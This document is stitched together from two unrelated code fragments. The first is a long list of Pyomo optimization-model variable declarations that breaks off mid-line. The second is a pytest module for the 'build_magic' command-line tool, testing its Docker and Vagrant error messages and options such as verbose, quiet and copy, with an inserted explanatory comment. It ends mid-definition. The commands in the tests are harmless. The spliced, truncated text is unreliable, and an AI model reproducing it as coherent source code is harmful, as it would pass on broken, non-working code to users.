m.b868 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b869 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b870 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b871 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b872 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b873 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b874 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b875 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b876 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b877 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b878 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b879 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b880 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b881 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b882 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b883 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b884 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b885 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b886 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b887 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b888 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b889 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b890 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b891 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b892 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b893 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b894 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b895 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b896 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b897 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b898 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b899 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b900 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b901 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b902 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b903 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b904 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b905 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b906 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b907 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b908 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b909 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b910 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b911 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b912 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b913 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b914 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b915 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b916 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b917 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b918 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b919 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b920 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b921 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b922 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b923 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b924 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b925 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b926 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b927 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b928 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b929 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b930 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b931 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b932 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b933 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b934 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b935 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b936 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b937 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b938 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b939 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b940 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b941 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b942 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b943 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b944 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b945 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b946 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b947 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b948 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b949 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b950 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b951 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b952 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b953 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b954 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b955 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b956 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b957 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b958 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b959 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b960 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b961 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b962 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b963 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b964 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b965 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b966 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b967 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b968 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b969 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b970 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b971 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b972 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b973 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b974 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b975 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b976 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b977 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b978 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b979 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b980 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b981 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b982 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b983 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b984 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b985 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b986 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b987 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b988 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b989 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b990 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b991 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.b992 = Var(within=Binary,bounds=(0,1),initialize=0.03125)
m.x994 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x995 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x996 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x997 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x998 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x999 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1000 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1001 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1002 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1003 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1004 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1005 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1006 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1007 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1008 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1009 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1010 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1011 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1012 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1013 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1014 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1015 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1016 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1017 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1018 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1019 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1020 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1021 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1022 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1023 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1024 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1025 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1026 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1027 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1028 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1029 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1030 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1031 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1032 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1033 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1034 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1035 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1036 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1037 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1038 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1039 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1040 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1041 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1042 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1043 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1044 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1045 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1046 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1047 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1048 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1049 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1050 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1051 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1052 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1053 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1054 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1055 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1056 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1057 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1058 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1059 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1060 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1061 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1062 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1063 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1064 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1065 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1066 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1067 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1068 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1069 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1070 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1071 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1072 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1073 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1074 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1075 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1076 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1077 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1078 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1079 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1080 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1081 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1082 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1083 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1084 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1085 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1086 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1087 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1088 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1089 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1090 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1091 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1092 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1093 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1094 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1095 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1096 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1097 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1098 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1099 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1100 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1101 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1102 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1103 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1104 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1105 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1106 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1107 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1108 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1109 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1110 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1111 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1112 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1113 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1114 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1115 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1116 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1117 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1118 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1119 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1120 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1121 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1122 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1123 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1124 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1125 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1126 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1127 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1128 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1129 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1130 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1131 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1132 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1133 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1134 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1135 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1136 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1137 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1138 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1139 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1140 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1141 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1142 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1143 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1144 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1145 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1146 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1147 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1148 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1149 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1150 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1151 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1152 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1153 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1154 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1155 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1156 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1157 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1158 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1159 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1160 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1161 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1162 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1163 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1164 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1165 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1166 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1167 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1168 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1169 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1170 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1171 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1172 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1173 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1174 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1175 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1176 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1177 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1178 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1179 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1180 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1181 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1182 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1183 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1184 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1185 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1186 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1187 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1188 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1189 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1190 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1191 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1192 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1193 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1194 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1195 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1196 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1197 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1198 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1199 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1200 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1201 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1202 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1203 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1204 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1205 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1206 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1207 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1208 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1209 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1210 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1211 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1212 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1213 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1214 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1215 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1216 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1217 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1218 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1219 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1220 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1221 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1222 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1223 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1224 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1225 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1226 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1227 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1228 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1229 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1230 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1231 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1232 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1233 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1234 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1235 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1236 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1237 | |
assert 'Setup failed: A build-magic container is already running.' in res.output
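# NOTE (added for clarity, not part of the original test module): the fixtures used throughout
# this file (cli, cat, cp, ls, tmp_file, config_file, ...) come from the suite's conftest, which
# is not shown in this excerpt. Based on how `cli.invoke(...)`, `res.output` and `res.exit_code`
# are used, the `cli` fixture is assumed to be a click test runner; a minimal sketch might be:
#
#     import pytest
#     from click.testing import CliRunner
#
#     @pytest.fixture
#     def cli():
#         """Provide a Click test runner for invoking the build_magic CLI."""
#         return CliRunner()
#
# The real fixture may add extra setup/teardown; this is an assumption for illustration only.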
def test_cli_docker_not_found(cli, mocker):
"""Test the case where Docker isn't running or isn't installed."""
mocker.patch('docker.from_env', side_effect=DockerDaemonError)
res = cli.invoke(build_magic, ['-r', 'docker', '-e', 'alpine:latest', 'echo', '"hello world"'])
assert 'Setup failed: Cannot connect to Docker daemon. Is Docker installed and running?' in res.output
def test_cli_docker_hostwd_not_found(cli, mocker):
"""Test the case where the hostwd doesn't exist."""
mocker.patch('pathlib.Path.exists', return_value=False)
res = cli.invoke(build_magic, ['-p', 'hostwd', 'fake', '-r', 'docker', '-e', 'alpine:latest', 'echo', 'hello'])
assert res.output == 'The host working directory was not found.\n'
assert res.exit_code == ExitCode.INPUT_ERROR.value
def test_cli_vagrant_not_found(cli, mocker):
"""Test the case where Vagrant isn't found or installed."""
mocker.patch('vagrant.which', return_value=None)
mocker.patch('pathlib.Path.exists', return_value=True)
res = cli.invoke(build_magic, ['-r', 'vagrant', '-e', 'files/Vagrantfile', 'echo', '"hello world"'])
assert 'The Vagrant executable cannot be found. Please check if it is in the system path.' in res.output
def test_cli_vagrant_hostwd_not_found(cli, mocker):
"""Test the case where the hostwd doesn't exist."""
mocker.patch('pathlib.Path.exists', return_value=False)
res = cli.invoke(build_magic, ['-r', 'vagrant', '-e', 'fake/Vagrantfile', 'echo', '"hello world"'])
assert res.output == 'The host working directory was not found.\n'
assert res.exit_code == ExitCode.INPUT_ERROR.value
def test_cli_vagrant_missing_environment(cli):
"""Test the case where the vagrant runner is called without the environment option."""
ref = """Environment must be a path to a Vagrant file if using the Vagrant runner.
"""
res = cli.invoke(build_magic, ['-r', 'vagrant', 'ls'])
assert res.exit_code == ExitCode.INPUT_ERROR
assert res.output == ref
def test_cli_empty_string_command(cli):
"""Test the case where the command provided is an empty string."""
ref = """There are no commands to execute.
"""
res = cli.invoke(build_magic, ['-c', 'execute', ''])
assert res.exit_code == ExitCode.INPUT_ERROR
assert res.output == ref
def test_cli_artifacts_but_empty_string_command(cli):
"""Test the case where artifacts are provided as arguments but with no command."""
res = cli.invoke(build_magic, ['file1.txt', 'file2.txt'])
assert res.exit_code == ExitCode.FAILED
def test_cli_options_no_command(cli):
"""Test the case where options are provided without a command."""
res = cli.invoke(build_magic, ['--verbose', '--plain'])
assert res.exit_code == ExitCode.NO_TESTS
def test_cli_verbose_output(cli):
"""Verify the --verbose option works correctly."""
ref = """[ INFO ] OUTPUT: hello world"""
res = cli.invoke(build_magic, ['--verbose', '--plain', 'echo hello world'])
assert res.exit_code == ExitCode.PASSED
assert ref in res.output
ref = """OUTPUT: hello world"""
res = cli.invoke(build_magic, ['--verbose', 'echo hello world'])
assert res.exit_code == ExitCode.PASSED
assert ref in res.output
ref = """OUTPUT: hello world"""
res = cli.invoke(build_magic, ['--verbose', '--fancy', 'echo hello world'])
assert res.exit_code == ExitCode.PASSED
assert ref in res.output
def test_cli_quiet(cli):
"""Verify the --quiet option supresses output correctly."""
res = cli.invoke(build_magic, ['--quiet', '--verbose', 'echo hello world'])
assert res.exit_code == ExitCode.PASSED
assert not res.output
res = cli.invoke(build_magic, ['--quiet', 'cp'])
assert res.exit_code == ExitCode.FAILED
assert not res.output
def test_cli_version(cli):
"""Verify the --version option works correctly."""
res = cli.invoke(build_magic, ['--version'])
assert res.exit_code == ExitCode.PASSED
assert res.output == f'{version}\n'
def test_keyboard_interrupt(cli, mocker):
"""Test the case where build-magic is interrupted with SIGINT."""
mocker.patch('build_magic.core.Engine.run', side_effect=KeyboardInterrupt)
ref = """
build-magic interrupted and exiting....
"""
res = cli.invoke(build_magic, ['sleep 5'])
assert res.exit_code == ExitCode.INTERRUPTED
assert res.output == ref
def test_cli_copy(cat, cli, tmp_file):
"""Verify the --copy option works correctly."""
res = cli.invoke(
build_magic,
['--copy', str(tmp_file), '--verbose', '-c', 'execute', f'{cat} hello.txt', 'hello.txt'],
)
assert 'OUTPUT: hello world' in res.output
assert res.exit_code == ExitCode.PASSED
def test_cli_working_directory(cat, cli, tmp_file):
"""Verify the --wd option works correctly."""
res = cli.invoke(build_magic, ['--wd', str(tmp_file), '--verbose', '-c', 'execute', f'{cat} hello.txt'])
assert 'OUTPUT: hello world' in res.output
assert res.exit_code == ExitCode.PASSED
def test_cli_copy_working_directory(cat, cli, current_file):
"""Verify the --copy and --wd options work together correctly."""
res = cli.invoke(
build_magic,
['--copy', '.', '--wd', str(current_file), '--verbose', '-c', 'build', f'{cat} hello.txt', 'hello.txt'],
)
assert 'OUTPUT: hello world' in res.output
assert res.exit_code == ExitCode.PASSED
def test_cli_continue_on_fail(cli):
"""Verify the --continue option works correctly."""
res = cli.invoke(build_magic, ['--verbose', '--continue', '-c', 'execute', 'cp', '-c', 'execute', 'echo hello'])
assert 'OUTPUT: hello' in res.output
assert res.exit_code == ExitCode.FAILED
def test_cli_stop_on_fail(cli, cp):
"""Verify the --stop option works correctly."""
res = cli.invoke(build_magic, ['--verbose', '--stop', '-c', 'execute', f'{cp}', '-c', 'execute', 'echo hello'])
if sys.platform == 'linux':
assert 'cp: missing file operand' in res.output
elif sys.platform == 'win32':
assert 'The syntax of the command is incorrect.' in res.output
else:
assert 'usage: cp' in res.output or 'cp: missing file operand' in res.output
assert 'OUTPUT: hello' not in res.output
assert res.exit_code == ExitCode.FAILED
def test_cli_parameters(cli):
